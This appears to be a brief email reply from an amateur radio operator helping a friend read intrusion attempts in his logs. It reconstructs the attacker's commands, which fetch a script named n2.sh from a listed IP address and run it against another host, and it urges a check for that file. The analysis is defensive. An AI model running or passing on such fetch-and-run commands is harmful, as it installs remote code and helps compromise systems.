Bill,
First, I noticed:
- All the source IP addresses are allocated to ISPs in the Philippines
- Piecing the information together, I get something more like:
# get 46.183.217.145 -c n2.sh
# n2.sh -g 185.103.109<THIS OCTET IS MISSING FROM THE COMMENTS>
# echo -e 'teot'
CHECK THAT YOU DO NOT FIND A FILE NAMED n2.sh ON YOUR SYSTEM!?!?
I surmise the malicious person is:
- attempting to run 'get' and other commands on your local host;
- and/or trying to send commands through your host - to a 3rd compromised system
When did you begin running fail2ban and firewalls: a while ago, or recently?
73,
- Lynwood
KB3VWG